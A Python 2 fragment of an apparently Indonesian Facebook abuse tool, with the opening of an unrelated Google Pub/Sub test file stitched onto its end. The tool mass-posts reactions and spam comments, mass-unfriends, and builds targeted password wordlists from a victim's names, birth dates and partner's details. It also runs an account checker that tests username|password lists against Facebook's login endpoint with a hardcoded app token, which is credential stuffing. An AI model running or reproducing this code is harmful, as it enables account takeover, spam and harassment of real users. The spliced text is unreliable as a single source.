except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
test_streaming_pull_manager.py
|
# Copyright 2018, Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import time
import types as stdlib_types
import mock
import pytest
from google.api_core import bidi
from google.api_core import exceptions
from google.cloud.pubsub_v1 import types
from google.cloud.pubsub_v1.gapic import subscriber_client_config
from google.cloud.pubsub_v1.subscriber import client
from google.cloud.pubsub_v1.subscriber import message
from google.cloud.pubsub_v1.subscriber import scheduler
from google.cloud.pubsub_v1.subscriber._protocol import dispatcher
from google.cloud.pubsub_v1.subscriber._protocol import heartbeater
from google.cloud.pubsub_v1.subscriber._protocol import leaser
from google.cloud.pubsub_v1.subscriber._protocol import messages_on_hold
from google.cloud.pubsub_v1.subscriber._protocol import requests
from google.cloud.pubsub_v1.subscriber._protocol import streaming_pull_manager
import grpc
@pytest.mark.parametrize(
"exception,expected_cls",
[
(ValueError("meep"), ValueError),
(
mock.create_autospec(grpc.RpcError, instance=True),
exceptions.GoogleAPICallError,
),
],
)
def test__maybe_wrap_exception(exception, expected_cls):
assert isinstance(
streaming_pull_manager._maybe_wrap_exception(exception), expected_cls
)
def test__wrap_callback_errors_no_error():
msg = mock.create_autospec(message.Message, instance=True)
callback = mock.Mock()
on_callback_error = mock.Mock()
streaming_pull_manager._wrap_callback_errors(callback, on_callback_error, msg)
callback.assert_called_once_with(msg)
msg.nack.assert_not_called()
on_callback_error.assert_not_called()
def test__wrap_callback_errors_error():
callback_error = ValueError("meep")
msg = mock.create_autospec(message.Message, instance=True)
callback = mock.Mock(side_effect=callback_error)
on_callback_error = mock.Mock()
